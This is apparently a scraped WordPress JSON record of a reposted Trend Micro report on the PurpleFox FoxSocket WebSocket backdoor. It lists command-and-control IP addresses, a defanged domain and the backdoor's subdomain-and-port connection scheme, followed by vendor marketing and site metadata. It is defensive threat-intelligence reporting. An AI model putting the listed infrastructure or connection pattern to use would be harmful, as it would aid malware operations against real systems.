rowspan=\"7\">C&C server<\/td>\n<td>Turkey, US, UAE<\/td>\n<\/tr>\n<tr>\n<td>185.112.144.101<\/td>\n<td>Turkey<\/td>\n<\/tr>\n<tr>\n<td>93.95.226.157<\/td>\n<td>US<\/td>\n<\/tr>\n<tr>\n<td>93.95.228.163<\/td>\n<td>US<\/td>\n<\/tr>\n<tr>\n<td>93.95.227.183<\/td>\n<td>–<\/td>\n<\/tr>\n<tr>\n<td>93.95.227.169<\/td>\n<td>UAE<\/td>\n<\/tr>\n<tr>\n<td>93.95.227.179<\/td>\n<td>–<\/td>\n<\/tr>\n<tr>\n<td>185.112.146.72<\/td>\n<td rowspan=\"2\">Potential C&C server<\/td>\n<td>–<\/td>\n<\/tr>\n<tr>\n<td>185.112.146.83<\/td>\n<td>–<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The backdoor picks one subdomain randomly from the configuration data and tries to connect via WebSockets. If it fails to connect on port 12345, it will try to resolve another subdomain.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox20.png\" alt=\"Random C&C servers\"><figcaption>Figure 20. Random C&C servers<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"43.748930971289\">\n<div readability=\"34.61453879047\">\n<p>The main domain <i>advb9fyxlf2v[.]com<\/i> used by these servers \u2014 registered on June 17, 2021, just within days of the first observed variant \u2014 is mainly for load balancing across the multiple active servers.<\/p>\n<p><span class=\"body-subhead-title\">Conclusion<\/span><\/p>\n<p>The rootkit capabilities of PurpleFox make it more capable of carrying out its objectives in a stealthier manner. They allow PurpleFox to persist on affected systems as well as deliver further payloads to affected systems. We are still monitoring these new variants and their dropped payloads. The new .NET WebSocket backdoor (called FoxSocket, which we detect as Backdoor.MSIL.PURPLEFOX.AA) is being closely monitored to discover any more information about this threat actor\u2019s intentions and objectives.<\/p>\n<p><span class=\"body-subhead-title\">Trend Micro Solutions and Indicators of Compromise<\/span><\/p>\n<p>The capabilities of the <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\">Trend Micro Vision One<\/a> platform made both the detection of this attack and our investigation into it possible. We took into account metrics from the network and endpoints that would indicate potential attempts of exploitation. The Trend Micro Vision One Workbench shows a holistic view of the activities that are observed in a user\u2019s environment by highlighting important attributes related to the attack.<\/p>\n<p><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response\/managed-xdr-mdr.html\">Trend Micro Managed XDR<\/a> offers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing 24\/7 service that allows organizations to have one single source of detection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro\u2019s wealth of global threat intelligence. <\/p>\n<p>All IOCs related to this attack can be found in <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/iocs-purplefox.txt\">this separate file<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p>   <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p>   <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/j\/purplefox-adds-new-backdoor-that-uses-websockets.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":44111,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9511,9508,9513,9509],"class_list":["post-44110","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-endpoints","tag-trend-micro-research-malware","tag-trend-micro-research-research"],"yoast_head":"\n<title>PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-10-19T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox-main.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"PurpleFox Adds New Backdoor That Uses WebSockets\",\"datePublished\":\"2021-10-19T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\"},\"wordCount\":2694,\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\",\"name\":\"PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png\",\"datePublished\":\"2021-10-19T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png\",\"width\":602,\"height\":534},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.threatshub.org\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"PurpleFox Adds New Backdoor That Uses WebSockets\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n","yoast_head_json":{"title":"PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/","og_locale":"en_US","og_type":"article","og_title":"PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2021-10-19T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox-main.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"PurpleFox Adds New Backdoor That Uses WebSockets","datePublished":"2021-10-19T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/"},"wordCount":2694,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : Endpoints","Trend Micro Research : Malware","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/","url":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/","name":"PurpleFox Adds New Backdoor That Uses WebSockets 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png","datePublished":"2021-10-19T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/purplefox-adds-new-backdoor-that-uses-websockets.png","width":602,"height":534},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"PurpleFox Adds New Backdoor That Uses WebSockets"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=44110"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/44110\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/44111"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=44110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=44110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=44110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

{"id":44110,"date":"2021-10-19T00:00:00","date_gmt":"2021-10-19T00:00:00","guid":{"rendered":"urn:uuid:a842acb8-6bd7-989a-6b57-3b7aad2a273a"},"modified":"2021-10-19T00:00:00","modified_gmt":"2021-10-19T00:00:00","slug":"purplefox-adds-new-backdoor-that-uses-websockets","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/purplefox-adds-new-backdoor-that-uses-websockets\/","title":{"rendered":"PurpleFox Adds New Backdoor That Uses WebSockets"},"content":{"rendered":"